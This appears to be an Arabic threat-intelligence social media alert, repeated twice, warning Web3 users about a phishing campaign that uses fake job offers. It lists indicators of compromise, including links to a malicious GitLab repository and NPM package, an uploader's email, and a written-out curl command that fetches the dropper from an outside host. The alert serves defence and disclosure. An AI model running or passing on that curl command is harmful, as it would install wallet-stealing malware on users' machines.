🚨 تنبيه أمان TI 🚨
وفقًا لشريك المجتمع @1nf0s3cpt، حملة تصيد نشطة تستهدف مستخدمي Web3 بعروض عمل مزيفة (على سبيل المثال، $120/ساعة) لخداعهم في تنفيذ نص ضار يسرق ملفات المحفظة.
🔍 المؤشرات الرئيسية:
🔸مستودع GitLab: https://t.co/ivGN93PS4b
🔸البرمجية المُسقطة: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 طريقة الهجوم مشابهة جدًا لاستخدام لازاروس السابق لحزم NPM لنشر الشيفرات الضارة:
https://t.co/bBC4i2vYpA
🚨 وجدنا أن حزمة NPM ضارة جديدة قد تم نشرها للتو:
https://t.co/SjgmO1FOIL
🔸ربما مرتبطة بـ GitHub: apollo-hero
🔸البريد الإلكتروني للرافع: skelstar125@gmail.com
⚠️ لا تقم بتثبيت أو تشغيل حزم أو نصوص غير معروفة. تحقق دائمًا من المصادر.
#LAZARUS #التصيد
وفقًا لشريك المجتمع @1nf0s3cpt، حملة تصيد نشطة تستهدف مستخدمي Web3 بعروض عمل مزيفة (على سبيل المثال، $120/ساعة) لخداعهم في تنفيذ نص ضار يسرق ملفات المحفظة.
🔍 المؤشرات الرئيسية:
🔸مستودع GitLab: https://t.co/ivGN93PS4b
🔸البرمجية المُسقطة: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 طريقة الهجوم مشابهة جدًا لاستخدام لازاروس السابق لحزم NPM لنشر الشيفرات الضارة:
https://t.co/bBC4i2vYpA
🚨 وجدنا أن حزمة NPM ضارة جديدة قد تم نشرها للتو:
https://t.co/SjgmO1FOIL
🔸ربما مرتبطة بـ GitHub: apollo-hero
🔸البريد الإلكتروني للرافع: skelstar125@gmail.com
⚠️ لا تقم بتثبيت أو تشغيل حزم أو نصوص غير معروفة. تحقق دائمًا من المصادر.
#LAZARUS #التصيد

